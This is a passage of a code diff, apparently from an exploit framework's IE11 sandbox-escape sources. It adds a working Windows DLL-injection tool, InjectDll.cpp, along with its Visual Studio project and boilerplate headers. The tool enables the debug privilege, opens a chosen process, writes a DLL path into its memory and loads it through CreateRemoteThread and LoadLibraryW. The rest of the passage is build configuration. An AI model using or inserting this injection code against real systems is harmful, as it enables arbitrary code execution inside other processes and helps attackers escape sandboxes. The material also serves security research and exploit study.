// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
#include "stdafx.h"
BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if(!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
{
printf("Error 1 %d\n", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if(bEnablePrivilege)
{
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
}
else
{
tp.Privileges[0].Attributes = 0;
}
if(!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
{
printf("Error adjusting privilege %d\n", GetLastError());
return FALSE;
}
if(GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
printf("Not all privilges available\n");
return FALSE;
}
return TRUE;
}
int _tmain(int argc, _TCHAR* argv[])
{
if(argc < 3)
{
printf("Usage: InjectDll pid PathToDll\n");
return 1;
}
WCHAR path[MAX_PATH];
GetFullPathName(argv[2], MAX_PATH, path, nullptr);
int pid = wcstoul(argv[1], 0, 0);
printf("Injecting DLL: %ls into PID: %d\n", path, pid);
HANDLE hToken;
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);
SetPrivilege(hToken, SE_DEBUG_NAME, TRUE);
HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, pid);
if(hProcess)
{
size_t strSize = (wcslen(path) + 1) * sizeof(WCHAR);
LPVOID pBuf = VirtualAllocEx(hProcess, 0, strSize, MEM_COMMIT, PAGE_READWRITE);
if(pBuf == NULL)
{
printf("Couldn't allocate memory in process\n");
return 1;
}
SIZE_T written;
if (!WriteProcessMemory(hProcess, pBuf, path, strSize, &written))
{
printf("Couldn't write to process memory\n");
return 1;
}
LPVOID pLoadLibraryW = GetProcAddress(GetModuleHandle(L"kernel32"), "LoadLibraryW");
if(!CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibraryW, pBuf, 0, NULL))
{
printf("Couldn't create remote thread %d\n", GetLastError());
}
}
else
{
printf("Couldn't open process %d\n", GetLastError());
}
return 0;
}

155
external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.vcxproj vendored Executable file
View File

@ -0,0 +1,155 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>InjectDll</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="InjectDll.cpp" />
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

8
external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.cpp vendored Executable file
View File

@ -0,0 +1,8 @@
// stdafx.cpp : source file that includes just the standard includes
// InjectDll.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information
#include "stdafx.h"
// TODO: reference any additional headers you need in STDAFX.H
// and not in this file

12
external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.h vendored Executable file
View File

@ -0,0 +1,12 @@
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//
#pragma once
#include "targetver.h"
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>

8
external/source/exploits/IE11SandboxEscapes/InjectDll/targetver.h vendored Executable file
View File

@ -0,0 +1,8 @@
#pragma once
// Including SDKDDKVer.h defines the highest available Windows platform.
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
#include <SDKDDKVer.h>

Some files were not shown because too many files have changed in this diff Show More